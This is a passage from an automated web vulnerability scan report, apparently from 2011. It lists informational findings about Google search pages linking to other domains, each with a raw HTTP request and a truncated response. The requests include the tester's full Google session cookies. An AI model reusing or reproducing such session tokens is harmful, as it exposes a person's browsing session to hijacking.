<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ubwnpN9ODLwJ:www.prweb.com/releases/vulnerability/management/prweb5177334.htm+unified+vulnerability+management&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CGMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wideeyesecurity.com/Vulnerability-Management.asp" class=l onmousedown="return clk(this.href,'','','','8','','0CGQQFjAH')">eEye <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:KwTusuQmzC4J:www.wideeyesecurity.com/Vulnerability-Management.asp+unified+vulnerability+management&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://whitepapers.businessweek.com/detail/RES/1303414941_607.html" class=l onmousedown="return clk(this.href,'','','','9','','0CGoQFjAI')">Reduce the Cost of PCI DSS Compliance with <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:n39lYeRUYVgJ:whitepapers.businessweek.com/detail/RES/1303414941_607.html+unified+vulnerability+management&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CG8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cadre.net/About-Us/Unified-Vulnerability-Management-Live-Webinar-1770.html?ModKey=mk$clsc&amp;LayoutID=&amp;EventID=159&amp;p=04789AB9BBC384A7CDCCC4C7C7C378ABD1C6BBC084A8CAC1C6CC849CB9CCBD84ACC1C5BD84A4C7BBB9CCC1C7C6D68C848A848DD6" class=l onmousedown="return clk(this.href,'','','','10','','0CHAQFjAJ')">Events - CADRE.NET</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:VXqy3TIxQxEJ:www.cadre.net/About-Us/Unified-Vulnerability-Management-Live-Webinar-1770.html%3FModKey%3Dmk%24clsc%26LayoutID%3D%26EventID%3D159%26p%3D04789AB9BBC384A7CDCCC4C7C7C378ABD1C6BBC084A8CAC1C6CC849CB9CCBD84ACC1C5BD84A4C7BBB9CCC1C7C6D68C848A848DD6+unified+vulnerability+management&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:VXqy3TIxQxEJ:www.cadre.net/About-Us/Unified-Vulnerability-Management-Live-Webinar-1770.html%3FModKey%3Dmk%24clsc%26LayoutID%3D%26EventID%3D159%26p%3D04789AB9BBC384A7CDCCC4C7C7C378ABD1C6BBC084A8CAC1C6CC849CB9CCBD84ACC1C5BD84A4C7BBB9CCC1C7C6D68C848A848DD6+unified+vulnerability+management&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com','','','','10','','0CHUQIDAJ')">Cached</a>
...[SNIP]...
23.81. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Kayako+SupportSuite HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:14:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 38154

f94-wCe9....S....o...+..D..........O..c<!doctype html> <head> <title>Kayako SupportSuite - Google Search</title> <script>window.google={kEI:"Fci1TbqrKYLa0QHsidHSAg",kEXPI:"17259,24472,25907,27147
...[SNIP]...
<div><a href="http://www.issuetrak.com/s7..u1','','0CHAQoggwCg')">IssueTrak</a>
...[SNIP]...
23.82. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Clone+Guard HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:58:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 90525

<!doctype html> <head> <title>Clone Guard - Google Search</title> <script>window.google={kEI:"TcS1Ta3tNZTpgQeGrYC9Cw",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29050,29477,29509,29681,2968
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=Clone+Guard&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.clone-systems.com/resell-clone-guard.html" class=l onmousedown="return clk(this.href,'','','','1','','0CBUQFjAA')">Sell <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:66gU75B-BnwJ:www.clone-systems.com/resell-clone-guard.html+Clone+Guard&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBoQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.clone-systems.com/ecommerce/" class=l onmousedown="return clk(this.href,'','','','2','','0CBsQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FA1CaHZiY7oJ:www.clone-systems.com/ecommerce/+Clone+Guard&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCAQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://colocation.tmcnet.com/topics/colocation-solutions/articles/79288-clone-systems-unveils-clone-guard-virtual-private-datacenter.htm" class=l onmousedown="return clk(this.href,'','','','3','','0CCMQFjAC')">Clone Systems Unveils <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_7srX1L639sJ:colocation.tmcnet.com/topics/colocation-solutions/articles/79288-clone-systems-unveils-clone-guard-virtual-private-datacenter.htm+Clone+Guard&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCgQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.actionvillage.com/store/Colony-BMX-Bike-Hub-Clone-Guard-Tangerine_P19917C2774.cfm" class=l onmousedown="return clk(this.href,'','','','4','','0CCoQFjAD')">Colony BMX Bike Hub <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:U6ByQ2_CO24J:www.actionvillage.com/store/Colony-BMX-Bike-Hub-Clone-Guard-Tangerine_P19917C2774.cfm+Clone+Guard&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDMQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mocpages.com/moc.php/182067" class=l onmousedown="return clk(this.href,'','','','5','','0CDQQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0V3hVP9u4r0J:www.mocpages.com/moc.php/182067+Clone+Guard&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDkQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="https://mosaicsecurity.com/products/1654-clone-guard-enterprise-vulnerability-scanning-service" class=l onmousedown="return clk(this.href,'','','','6','','0CDoQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AhUQ3yDIguYJ:https://mosaicsecurity.com/products/1654-clone-guard-enterprise-vulnerability-scanning-service+Clone+Guard&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CD8QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloneguard.com/managed-utm.asp" class=l onmousedown="return clk(this.href,'','','','7','','0CEAQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uGMKuFFESz8J:www.cloneguard.com/managed-utm.asp+Clone+Guard&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEUQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloneguard.com/pen-test.asp" class=l onmousedown="return clk(this.href,'','','','8','','0CEYQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Klj2bKz5ADgJ:www.cloneguard.com/pen-test.asp+Clone+Guard&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://alternativesaga.wikia.com/wiki/Clone_guard" class=l onmousedown="return clk(this.href,'','','','9','','0CE0QFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TW4B9lKdk40J:alternativesaga.wikia.com/wiki/Clone_guard+Clone+Guard&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFIQIDAI')">Cached</a>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=lZQObcfSgoI" class=l onmousedown="return clk(this.href,'','10778255672871125634','','10','','0CFMQtwIwCQ')"><em>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=qn7l1DiZPCk" class=l onmousedown="return clk(this.href,'','12285509533158685737','','11','','0CFoQtwIwCg')">Assassin&#39;s Creed 2 Glitch and Tutorial #1 <b>
...[SNIP]...
23.83. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=pci+scan HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:42:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81992

<!doctype html> <head> <title>pci scan - Google Search</title> <script>window.google={kEI:"4Qa2TanzM4OltweNq6jqDg",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29050,29477,29509,29684,29822",
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=pci+scan&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.trust-guard.com/PCI-scanning-s/39.htm" class=l onmousedown="return clk(this.href,'','','','1','','0CCoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NI1O3c0VlsYJ:www.trust-guard.com/PCI-scanning-s/39.htm+pci+scan&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CC8QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="https://www.pcisecuritystandards.org/approved_companies_providers/approved_scanning_vendors.php" class=l onmousedown="return clk(this.href,'','','','2','','0CDEQFjAB')">Approved <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cRyZzDJebY4J:https://www.pcisecuritystandards.org/approved_companies_providers/approved_scanning_vendors.php+pci+scan&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDYQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nu2.nu/utils/" class=l onmousedown="return clk(this.href,'','','','3','','0CDgQFjAC')">Bart&#39;s utilities page</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:m2Q77pBSH7wJ:www.nu2.nu/utils/+pci+scan&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CD0QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="https://www.hackerguardian.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEEQFjAD')">Free Network Security with <em>
...[SNIP]...
<div class=osl><a href="https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html" onmousedown="return clk(this.href,'','','','4','','0CEcQ0gIoADAD')">Special Offers</a> - <a href="https://www.hackerguardian.com/hackerguardian/buy/pci_scan_compliancy.html" onmousedown="return clk(this.href,'','','','4','','0CEgQ0gIoATAD')">HackerGuardian PCI Scan Compliancy</a> - <a href="https://www.hackerguardian.com/hackerguardian/faqs.html" onmousedown="return clk(this.href,'','','','4','','0CEkQ0gIoAjAD')">FAQs</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:u2dEF41JfNsJ:https://www.hackerguardian.com/+pci+scan&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEYQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pcicomplianceguide.org/pci-scanvendors.php" class=l onmousedown="return clk(this.href,'','','','5','','0CEsQFjAE')">Approved <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:eq22hCK1-x0J:www.pcicomplianceguide.org/pci-scanvendors.php+pci+scan&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CFAQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ncircle.com/index.php?s=products_pci-compliance" class=l onmousedown="return clk(this.href,'','','','6','','0CFIQFjAF')">nCircle Certified <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:98U30DHm2-8J:www.ncircle.com/index.php%3Fs%3Dproducts_pci-compliance+pci+scan&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:98U30DHm2-8J:www.ncircle.com/index.php%3Fs%3Dproducts_pci-compliance+pci+scan&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com','','','','6','','0CFcQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.secureconnect.com/" class=l onmousedown="return clk(this.href,'','','','7','','0CFkQFjAG')">SecureConnect - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:w-0Kk6N5FOMJ:www.secureconnect.com/+pci+scan&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CF4QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.clone-systems.com/pci-scanning.html" class=l onmousedown="return clk(this.href,'','','','8','','0CGAQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wpZZnOEJBsQJ:www.clone-systems.com/pci-scanning.html+pci+scan&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGUQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.onestoppciscan.com/" class=l onmousedown="return clk(this.href,'','','','9','','0CGcQFjAI')">Welcome to Backbone Systems OneStopPCIScan.com</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rWJTHizR_vkJ:www.onestoppciscan.com/+pci+scan&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGwQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://comodo.com/business-security/pci-compliance/pci-scan.php" class=l onmousedown="return clk(this.href,'','','','10','','0CG4QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_7MKNyR-wNoJ:comodo.com/business-security/pci-compliance/pci-scan.php+pci+scan&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHMQIDAJ')">Cached</a>
...[SNIP]...
23.84. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=malware+virus HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://sorry.google.com/sorry/Captcha?continue=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmalware%2Bvirus&id=5949669040493980881&captcha=ditiesc&submit=Submit
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf; S=sorry=WbnEk7itoTuIPssOyKDfZA; GDSESS=ID=5291787839c86cd1:EX=1303757535:S=ADSvE-dYLqGVZRU9goNPGWtIQhblZ_kcyw

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:52:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 93193

<!doctype html> <head> <title>malware virus - Google Search</title> <script>window.google={kEI:"sJi1TY7jIYi3tgeW4NDqDg",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29050,29477,29509,29681,29
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=malware+virus&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Malware" class=l onmousedown="return clk(this.href,'','','','1','','0CCQQFjAA')"><em>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Malware#Purposes" onmousedown="return clk(this.href,'','','','1','','0CCsQ0gIoADAA')">Purposes</a> - <a href="http://en.wikipedia.org/wiki/Malware#Infectious_malware:_viruses_and_worms" onmousedown="return clk(this.href,'','','','1','','0CCwQ0gIoATAA')">Infectious malware: viruses ...</a> - <a href="http://en.wikipedia.org/wiki/Malware#Concealment:_Trojan_horses.2C_rootkits.2C_and_backdoors" onmousedown="return clk(this.href,'','','','1','','0CC0Q0gIoAjAA')">Concealment: Trojan horses ...</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:A_CmMBaIF7QJ:en.wikipedia.org/wiki/Malware+malware+virus&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCkQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx" class=l onmousedown="return clk(this.href,'','','','2','','0CC8QFjAB')">Malicious Software Removal Tool | Protect Your Computer</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6OKxByt_bOcJ:www.microsoft.com/security/pc-security/malware-removal.aspx+malware+virus&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://technet.microsoft.com/en-us/library/dd632948.aspx" class=l onmousedown="return clk(this.href,'','','','3','','0CDUQFjAC')">Defining <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fqfzNQAS-OgJ:technet.microsoft.com/en-us/library/dd632948.aspx+malware+virus&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDoQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bleepingcomputer.com/virus-removal/" class=l onmousedown="return clk(this.href,'','','','4','','0CDwQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ib2mwhZgom8J:www.bleepingcomputer.com/virus-removal/+malware+virus&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEEQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://home.mcafee.com/store/internet-security" class=l onmousedown="return clk(this.href,'','','','5','','0CEMQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LvZNGq6uozEJ:home.mcafee.com/store/internet-security+malware+virus&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://us.norton.com/security_response/malware.jsp" class=l onmousedown="return clk(this.href,'','','','6','','0CEoQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ML0kLUoYOxQJ:us.norton.com/security_response/malware.jsp+malware+virus&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.virus-malware.com/" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:KLc1h7TsvQoJ:www.virus-malware.com/+malware+virus&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.makeuseof.com/tag/10-free-online-malware-and-virus-scanners/" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')">10 Free Online <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wuZeu41RtyMJ:www.makeuseof.com/tag/10-free-online-malware-and-virus-scanners/+malware+virus&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF8QIDAH')">Cached</a>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=ns8Q2sofhlg" class=l onmousedown="return clk(this.href,'','11443383710051698264','','9','','0CGEQtwIwCA')">Manually Removing Any <em>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.5min.com/Video/How-to-Know-if-your-PC-has-a-Virus-or-Malware-Infection-76427954" class=l onmousedown="return clk(this.href,'','17659830216829156073','','10','','0CGgQtwIwCQ')">How to Know if your PC has a <em>
...[SNIP]...
<h3 class="r"><a href="http://www.virusbtn.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHAQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:1zXBaQmM6CUJ:www.virusbtn.com/+malware+virus&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHUQIDAK')">Cached</a>
...[SNIP]...
23.85. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=4&ved=0CC0QFjAD&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D523%26pg%3D373%26h%3D0%26hp%3D373&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNHcoCcsIqeas7ROQLotiEACsj1yhA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?m=523&pg=373&h=0&hp=373
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:24 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?m=523&amp;pg=373&amp;h=0&amp;hp=373">here</A>
...[SNIP]...
23.86. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

